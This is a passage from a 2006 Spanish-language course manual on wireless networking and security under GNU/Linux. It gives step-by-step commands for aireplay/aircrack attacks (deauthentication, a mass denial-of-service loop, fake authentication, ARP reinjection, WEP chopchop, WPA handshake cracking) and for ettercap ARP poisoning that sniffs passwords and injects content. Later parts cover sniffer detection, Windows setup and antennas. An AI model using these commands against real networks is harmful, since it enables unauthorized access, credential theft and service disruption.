wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
depmod -a
· Instalación del controlador HostAP (tarjetas Prism2)
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia stop
rmmod prism2_pci
rmmod hostap_pci
cd /usr/src
wget http://100h.org/wlan/linux/prism2/hostap-
controlador-0.4.5.tar.gz
wget http://100h.org/wlan/linux/patches/hostap-
controlador-0.3.9.patch
tar -xvzf hostap-controlador-0.4.5.tar.gz
cd hostap-controlador-0.4.5
patch -Np1 -i ../hostap-controlador-0.3.9.patch
make && make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-
ng.conf~
/etc/init.d/pcmcia start
modprobe hostap_pci &>/dev/null
· Instalación del controlador wlan-ng (Prism2 cards)
Nota importante: al insertar la tarjeta, wlan-ng flasheará el
firmware en la RAM (descarga volátil) con las versiones PRI 1.1.4 y
STA 1.8.3. Muchos usuarios tuvieron problemas con esta operación,
por lo que en ese caso es mejor usar hostap en su lugar. Además,
HostAP funciona de forma más fiable y soporta iwconfig mientras
que wlan-ng no.
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia stop
38 Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
rmmod prism2_pci
rmmod hostap_pci
find /lib/modules \( -name p80211* -o -name prism2* \)
\
-exec rm -v {} \;
cd /usr/src
wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-
pre26.tar.gz
wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-
pre26.patch
tar -xvzf wlanng-0.2.1-pre26.tar.gz
cd wlanng-0.2.1-pre26
patch -Np1 -i ../wlanng-0.2.1-pre26.patch
make config && make all && make install
mv /etc/pcmcia/hostap_cs.conf
/etc/pcmcia/hostap_cs.conf~
/etc/init.d/pcmcia start
modprobe prism2_pci &>/dev/null
· Instalación del controlador r8180-sa2400 (tarjetas RTL8180)
ifconfig wlan0 down
rmmod r8180
cd /usr/src
wget http://100h.org/wlan/linux/rtl8180/rtl8180-
0.21.tar.gz
wget http://100h.org/wlan/linux/patches/rtl8180-
0.21.patch
tar -xvzf rtl8180-0.21.tar.gz
cd rtl8180-0.21
patch -Np1 -i ../rtl8180-0.21.patch
make && make install
depmod -a
modprobe r8180
· Instalación del controlador rt2500 (Ralink b/g PCI/PCMCIA)
ifconfig ra0 down
rmmod rt2500
cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2500-cvs-
20051112.tgz
tar -xvzf rt2500-cvs-20051112.tgz
cd rt2500-cvs-20051112
cd Module
make && make install
modprobe rt2500
Asegúrate de cargar el controlador con modprobe (no insmod) y de
poner la tarjeta en modo Monitor antes de levantar la interfaz.
39
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Instalación del controlador rt2570 (Ralink b/g USB)
ifconfig rausb0 down
rmmod rt2570
cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2570-cvs-
20051112.tgz
tar -xvzf rt2570-cvs-20051112.tgz
cd rt2570-cvs-20051112
cd Module
make && make install
modprobe rt2570
El controlador no compila.
Esto normalmente ocurre cuando las cabeceras no coinciden con el kernel que estás
usando. En esta situación simplemente recompila un kernel nuevo, instálalo y reinicia.
Luego, prueba otra vez a compilar el controlador.
Ver HOWTO para más detalles sobre cómo compilar el kernel.
¿ Cómo uso aireplay ?
Si el controlador está correctamente parcheado, aireplay es capaz de
inyectar paquetes 802.11 en modo Monitor en bruto; actualmente
implementa un conjunto de 5 ataques diferentes.
Si recibes el mensaje “ioctl(SIOCGIFINDEX) failed: No such
device”, revisa que el nombre de tu dispositivo es correcto y que no has
olvidado un parámetro en la línea de comandos.
En los siguientes ejemplos, 00:13:10:30:24:9C es la dirección MAC del
punto de acceso (en el canal 6), y 00:09:5B:EB:C5:2B es la dirección MAC
de un cliente inalámbrico.
· Ataque 0: deautenticación
Este ataque es probablemente el más útil para recuperar un ESSID
oculto (no difundido) y para capturar “saludos” WPA forzando a los
clientes a reautenticarse. También puede ser usado para generar
peticiones ARP en tanto que los clientes Windows a veces vacían su
cache de ARP cuando son desconectados. Desde luego, este ataque
es totalmente inservible si no hay clientes asociados.
Normalmente es más efectivo fijar como blanco una estación
específica usando el parámetro -c.
40
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Algunos ejemplos:
· Captura del “saludo” WPA una Atheros
airmon.sh start ath0
airodump ath0 out 6 (cambia a otra consola)
aireplay -0 5 -a 00:13:10:30:24:9C -c
00:09:5B:EB:C5:2B ath0
(espera unos segundos)
aircrack -w /ruta/al/diccionario out.cap
· Generar peticiones ARP con una tarjeta Prism2
airmon.sh start wlan0
airodump wlan0 out 6 (cambia a otra consola)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h
00:09:5B:EB:C5:2B wlan0
Después de enviar tres tandas de paquetes de deautenticación,
comenzamos a escuchar en busca de peticiones ARP con el
ataque 3. La opción -h es esencial y debe ser la dirección
MAC de un cliente asociado.
Si el controlador es wlan-ng, debes ejecutar el script
airmon.sh; de otro modo la tarjeta no estará preparada
correctamente para la inyección.
· Denegación de servicio masiva con una tarjeta RT2500
airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0
Con el parámetro 0, este ataque enviará en un bucle infinito paquetes
de deautenticación a las direcciones de broadcast, evitando así que
los clientes permanezcan conectados.
· Ataque 1: autenticación falsa
Este ataque es particularmente útil cuando no hay clientes asociados:
creamos la dirección MAC de un cliente falso, la cual quedará
registrada en la tabla de asociación del AP. Esta dirección será usada
para los ataques 3 (reinyección de peticiones ARP) y 4
(desencriptación WEP “chopchop”). Es mejor preparar la tarjeta con
la MAC usada (abajo, 00:11:22:33:44:55) de modo que el
controlador envíe ACKs de forma adecuada.
41
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
De todos modos si este ataque falla y hay ya un cliente asociado,
es más efectivo usar simplemente su dirección MAC (aquí,
00:09:5B:EB:C5:2B) para los ataques 3 y 4.
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
aireplay -1 0 -e “el ssid” -a 00:13:10:30:24:9C -h
00:11:22:33:44:55 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful 
Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar
paquetes estando en modo Infraestructura (la clave WEP en sí misma no
importa, en tanto que el AP acepte autenticación abierta). Por lo que, en
lugar de usar el ataque 1, puedes sólo asociarte e inyectar / monitorizar a
través de la interfaz athXraw:
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid “el ssid” key AAAAAAAAAA
ifconfig ath0 up
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump ath0raw out 6
Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará
automáticamente ath0 por ath0raw):
aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0
Algunos puntos de acceso requieren de reautenticación cada 30
segundos, si no nuestro cliente falso será considerado desconectado.
En este caso utiliza el retardo de re-asociación periódica:
aireplay -1 30 -e “el ssid” -a 00:13:10:30:24:9C -h
00:11:22:33:44:55 ath0
Si este ataque parece fallar (aireplay permanece enviando paquetes
de petición de autenticación), puede que esté siendo usado un
filtrado de direcciones MAC. Asegúrate también de que:
· Estás lo suficientemente cerca del punto de acceso.
· El controlador está correctamente parcheado e instalado.
42
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· La tarjeta está configurada en el mismo canal que el AP.
· El BSSID y el ESSID (opciones -a / -e) son correctos.
· Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Como recordatorio: no puedes inyectar con un chipset Centrino,
Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido
a limitaciones de firmware y/o controlador.
· Ataque 2: Reenvío interactivo de paquetes
Este ataque te permite elegir un paquete dado para reenviarlo; a
veces proporciona resultados más efectivos que el ataque 3
(reinyección automática de ARP).
Podrías usarlo, por ejemplo, para intentar el ataque “redifundir
cualesquiera datos”, el cuál sólo funciona si el AP realmente
reencripta los paquetes de datos WEP:
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
También puedes usar el ataque 2 para reenviar manualmente
paquetes de peticiones ARP encriptadas con WEP, cuyo tamaño es
bien 68 o 86 bytes (dependiendo del sistema operativo):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
· Ataque 3: Reinyección de petición ARP
El clásico ataque de reinyección de petición ARP es el mas efectivo
para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas
o bien la dirección MAC de un cliente asociado
(00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1
(00:11:22:33:44:55). Puede que tengas que esperar un par de
minutos, o incluso más, hasta que aparezca una petición ARP; este
ataque fallará si no hay tráfico.
Por favor, fíjate en que también puedes reutilizar una petición ARP
de una captura anterior usando el interruptor -r .
43
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55
ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305
packets…
· Ataque 4: El “chopchop” de KoreK (predicción de CRC)
Este ataque, cuando es exitoso, puede desencriptar un paquete de
datos WEP sin conocer la clave. Incluso puede funcionar con WEP
dinámica. Este ataque no recupera la clave WEP en sí misma, sino
que revela meramente el texto plano. De cualquier modo, la mayoría
de los puntos de acceso no son en absoluto vulnerables. Algunos
pueden en principio parecer vulnerables pero en realidad tiran los
paquetes menores de 60 bytes. Este ataque necesita al menos un
paquete de datos WEP.
· Primero, desencriptemos un paquete:
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
· Echemos un vistazo a la dirección IP:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap,
link-type […]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo
request seq 1
· Ahora, forjemos una petición ARP.
La IP inicial no importa (192.168.1.100), pero la Ip de
destino (192.168.1.2) debe responder a peticiones ARP. La
dirección MAC inicial debe corresponder a una estación
asociada.
./arpforge replay_dec-0627-022301.xor 1
00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2
arp.cap
· Y reenviemos nuestra petición ARP forjada:
aireplay -2 -r arp.cap ath0
44
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
6. D
etección de Sniffers, envenenamiento ARP y modos promiscuos.
· Herramienta NAST ( detección de modo promiscuo)
Nast es un detector de sniffers, podemos detectar, si una tarjeta está en modo promiscuo, nos
puede dar la lista de host con sus macs e ips, encontrar el gateway de la red, revisar si hay algún
envenenamiento por arps. Podéis descargarlo de (http://nast.berlios.de/)
Bash# nast -P 192.168.1.15
Nast V. 0.2.0
This check can have false response, pay attention!
Scanning for sniffer the following host:
192.168.1.15 (192.168.1.15) ———> Found!
Otra herramienta similar es sniffdet (depende de libnet0-dev), muy útil para detectar modos
promiscuos. Podemos descargarlo en (http://surfnet.dl.sourceforge.net/sourceforge/sniffdet/)
BASH# sniffdet -t latency -i wlan0 192.168.1.15 -v
————————————————————
Sniffdet Report
Generated on: Sun Dec 4 23:04:41 2005
————————————————————
Tests Results for target 192.168.1.15
————————————————————
Test: Latency test
Ping response with custom packet flood
Validation: OK
Started on: Sun Dec 4 23:04:28 2005
Finished on: Sun Dec 4 23:04:41 2005
Bytes Sent: 141298
Bytes Received: 0
Packets Sent: 2279
Packets Received: 0
————————————————————
RESULT:
Normal time: 0.0
Flood round-trip min/avg/max: 214748364.7/0.0/0.0 ms
————————————————————
————————————————————
Number of valid tests: #1
Number of tests with positive result: #0
————————————————————
La importancia de detectar si estamos siendo escaneados es muy alta en redes inalámbricas ya que
la seguridad de estas se ve muchas veces en entredicho.
45
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Ettercap y envenenamiento ARP
Como hemos visto antes Ettercap es una herramienta muy útil, vamos a profundizar un poco
mas en el uso.
Envenenando la red en un rango de 192.168.0.2 hasta 192.168.0.10 con un puerta de enlace
192.168.0.1.
BASH# ettercap -Tq -M arp /192.168.0.1/ /192.168.0.2-10/
Para mostrar por pantalla los usuarios y contraseñas que pasan por la red sin encriptación alguna.
BASH# ettercap -Tzq
Esto es realmente divertido, aunque también útil si le damos algo de vueltas a la cabeza, el uso de
filtros consiste en suplantar información en determinados puertos.
BASH# etterfilter web.filter -o web.ef
BASH# ettercap -T -q -F web.ef -M ARP // //
BASH# ettercap -T -q -F web.ef -M ARP /192.168.22.47/ //
Un ejemplo seria filtrar imágenes para que el navegador web de la víctima solo viese las imágenes
ke le inyectamos, o incluso en una conversación de msn se podría suplantar palabras por otras.
46
seguridad-47_1.jpg
seguridad-47_2.jpg
seguridad-47_3.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
7. C
onfiguración de clientes Windows y aplicaciones en Redes Inalámbricas.
· Configuración de cliente en MS Windows XP
Lo primero que hacemos es detectar el dispositivo Wireless, en nuestra máquina.
Llegó el momento de instalar los drivers. En este cuadro de diálogo seleccionaremos la primera
opción, ahorrándonos así “quebraderos de cabeza”: Instalar automáticamente el software
(recomendado) e insertamos el CD o el disquete con nuestros drivers
Una vez finalizado este asistente, tendremos nuestro dispositivo listo para usarse.47
seguridad-48_1.jpg
seguridad-48_2.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Configuración de la Tarjeta Wi-FiAhora configuraremos nuestro dispositivo inalámbrico para la red Wireless.
Inicio > Configuración > Conexiones de red
Dentro de conexiones de red, seleccionaremos Conexión de red inalámbrica y haremos clic con el
botón derecho.
Una vez desplegado el menú emergente elegimos la opción Propiedades.
48 seguridad-49_1.jpg
seguridad-49_2.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
En esta ventana, configuraremos nuestro protocolo TCP/IP.
Seleccionando este elemento, haremos clic en el botón de Propiedades.Seleccionaremos las opciones como la imagen adjunta indica. Esto significa que nuestra red está
configurada mediante DHCP.
49
seguridad-50_1.jpg
seguridad-50_2.jpg
seguridad-50_3.jpg
seguridad-50_4.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
En la ventana de Conexiones de red hacemos clic con el botón derecho sobre Conexión de área
local, seleccionando la opción:
Ver redes inalámbricas disponibles
En esta ventana siguiente a la anterior, insertaremos la clave de la wireless.
Si la la red no tiene configurada la ip por DHCP, configuramos la dirección ip como cualquier red
cableada. Inicio > Panel de control > redes > propiedades protocolo TCP/IP.
Y en propiedades de Red inalámbrica seleccionamos la red a la que queremos conectar.
50
seguridad-51_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Aplicaciones de escaneo para windows Netstumbler
Una de las aplicaciones mas conocidas y mejores para el escaneo de redes en Windows es sin
duda Netstumbler (http://www.netstumbler.com/)
Por supuesto no es comparable a Kismet del que ya hemos hablado, ya que este usa el modo
monitor para escanear y el Netstumbler usa un modo activo de escaneo detectable fácilmente.
8. M
odelo de red urbana libre, comunidades Wireless
· Estructuras de la red
Hablar de estructuras de redes complejas entre varios nodos podría ser muy extenso, así que
voy a plantear el sistema de interconexión de nodos que tenemos en Almería Wireless.
Un poco de historia, en un principio con pocos nodos y pocos clientes, la interconexión de puntos
de acceso se hacia mediante WDS pero la experiencia nos ha dicho que muchos enlaces WDS y un
número de clientes elevado puede “romper” los enlaces si no se tiene un “link” o nivel de cobertura
muy óptimo Es decir a mas clientes el WDS se “caía” y tardaba un tiempo en restablecerse.
Por esto, se decidió probar con nodos dobles, un AP hacia de receptor de clientes con una antena
omnidireccional y por cable de red une con otro AP en modo cliente con antena direccional
enlazado a otro AP doble, así los enlaces fueron mucho mas estables aunque el doble de caros.
En el enrutamiento usamos OSPF ya que cada Nodo tiene un rango de IP distinto al siguiente, y
queremos que aunque no estén en el mismo rango todos los clientes de la red se vean entre si.
Actualmente sigue habiendo Nodos con WDS en espera de ser cambiados a Nodos dobles para
agilizar la transferencia en la red. A continuación un mapa de los distintos nodos existentes.
51
seguridad-52_1.jpg
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· Filosofía
La red, es creada por entusiastas en el año 2002, es totalmente LIBRE y sin animo de lucro.
Por eso no se usa encriptación ni portal cautivo, los servicios son públicos y se puede utilizar como
a cada uno le convenga.
Esto no quiere decir que no se lleve un control del acceso y del uso de la red.
La red es totalmente independiente de Ayuntamientos y organismos, así como de empresas. Como
dato mencionar el premio que nos dio la Junta de Andalucia por nuestra labor de comunicación el
año pasado y el reconocimiento de la prensa local (La voz de almería).
Para mas información de Redes urbanas Libres en Almería:
http://www.almeria-wireless.org
http://www.ejido-wireless.org
52
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
9. Ti
pos de antenas y radicación
Entre los modelos y variantes de antenas, se pueden distinguir 2 grandes familias: Las antenas
Direccionales y las antenas Omnidireccionales. Como su nombre indica, las direccionales emiten
la señal hacia un punto en concreto, con mayor o menor precisión. las “Omni” por el contrario,
emiten por igual en todas direcciones, en un radio de 360º, pero sólo sobre el plano perpendicular
de la antena.
Dentro del grupo de antenas direccionales, tenemos las de Rejilla o Grid, las Yagi, las parabólicas,
las “Pringles” y las de Panel. Las omnidireccionales suelen ser una simple varilla vertical.
Hay que decir que cuanta más alta sea la ganancia de la antena, mayores distancias podremos cubrir
con esta, y con mejor calidad podremos captar señales que pudieran llegarnos muy débilmente.
Referencia de distancias conseguidas con antenas:
- Antena de Parrilla de 24dB de ganancia: 70,5 km (El enlace entre Gran Canaria y Tenerife se hizo
con ésta antena.)
- Antena de Parrilla de 19dB de ganancia: 54 km entre dos antenas iguales.
- Antena OmniDireccional de 8dB de ganancia: 25 km de distancia, al otro extremo había una de
19dB grid.A 10km el enlace era a11Mbps, y a esa misma distancia conectamos entre 2 Omnis a
2Mbps.
A continuación podemos ver como se comportan mas gráficamente los principales tipos.
· Omnidireccionales
· direccionales
53
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
· panel
Duración
30 horas.
Material para la audiencia.
· Manual del curso (documentación en CDROM).
· Documentación oficial de Debian (en español).
· Réplica del TLDP-ES/LuCAS (documentación en español en CDROM)
54
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Términos de interés :
IEEE : corresponde a las siglas de The Institute of Electrical and Electronics Engineers, el Instituto de Ingenieros
Eléctricos y Electrónicos, una asociación técnico-profesional mundial dedicada a la estandarización entre otras cosas.
Punto de acceso (Access Point):
Se suele abreviar como AP. Piensa en ellos como un HUB de red normal: a él se conectan los equipos y es él quien
reparte los paquetes. Pues en WIFI es algo similar, es un dispositivo que ‘gestiona’, los paquetes lanzados por otras
estaciones inalámbricas, haciéndolas llegar a su destino. Además el punto de acceso, da conectividad a una red
cableada, por lo que la red inalámbrica puede acceder a otros equipos que estuvieran en una red cableada.
Tarjetas WIFI:
Las más conocidas son las que vienen en formato PCMCIA, para portátiles, aunque también las hay en formato PCI, en
CompactFlash, Smart Card y similares. Son equivalentes a una tarjeta de red normal, sólo que sin cables. Su
configuración a nivel de IP es EXACTAMENTE igual que una Ethernet.
Las diferencias más importantes entre una WIFI y una Ethernet, (a parte de que las primeras no llevan cable…) son: El
cifrado de datos, el ESSID, el Canal, y el ajuste de velocidad. Hablaré de todas ellas un poco más adelante.
A parte de las tarjetas, existen más aparatos: Bridges, Router, Gateways…. pero no es habitual encontrarlos en la
aplicación que nos interesa ahora. Si quieres saber algo sobre ellos, no dudes en escribirme.
Pigtail:
Es un pequeño cable, que sirve de adaptación entre la tarjeta WIFI y la antena o el cable que vaya hacia la antena. Este
Pigtail tiene 2 conectores: el propietario de cada tarjeta en un extremo, y por el otro un conector N estándar en la
mayoría de los casos. El pigtail depende del fabricante de la tarjeta, por lo que no es una cosa estándar.
Bibliografía
http://wikipedia.org Enciclopedia libre Online.
http://www.wndw.net Libro Creative Commons Wireless Networking in the developing world.
http://www.isp-planet.com/fixed_wireless/equipment/2001/dMystifying_dB.html dMystifying the dB
Manpages iwconfig
http://www.ei.uvigo.es/noticias/docu-wireless/conf-wifi-winxp.htm Configuración Red Wireless en Windows (No
sujeto a licencia CC de esta obra)
http://www.almeria-wireless.org comunidad wireless libre de Almería
http://www.debianitas.net Debian GNU/Linux en Español
http://gabaon.bravehost.com/aircrack_doc_es.htm Documentación de Aircrack en castellano
55
Curso Uso y Seguridad en Redes Inalámbricas sobre GNU/Linux
Emilio Guirado – 7 Marzo 2006
Licencia
LA OBRA (SEGÚN SE DEFINE MÁS ADELANTE) SE PROPORCIONA BAJO LOS TÉRMINOS DE ESTA
LICENCIA PÚBLICA DE CREATIVE COMMONS (”CCPL” O “LICENCIA”). LA OBRA SE ENCUENTRA
PROTEGIDA POR LA LEY ESPAÑOLA DE PROPIEDAD INTELECTUAL Y/O CUALESQUIERA OTRAS
NORMAS RESULTEN DE APLICACIÓN. QUEDA PROHIBIDO CUALQUIER USO DE LA OBRA DIFERENTE
A LO AUTORIZADO BAJO ESTA LICENCIA O LO DISPUESTO EN LAS LEYES DE PROPIEDAD
INTELECTUAL.
MEDIANTE EL EJERCICIO DE CUALQUIER DERECHO SOBRE LA OBRA, USTED ACEPTA Y CONSIENTE
LAS LIMITACIONES Y OBLIGACIONES DE ESTA LICENCIA. EL LICENCIADOR LE CEDE LOS DERECHOS
CONTENIDOS EN ESTA LICENCIA, SIEMPRE QUE USTED ACEPTE LOS PRESENTES TÉRMINOS Y
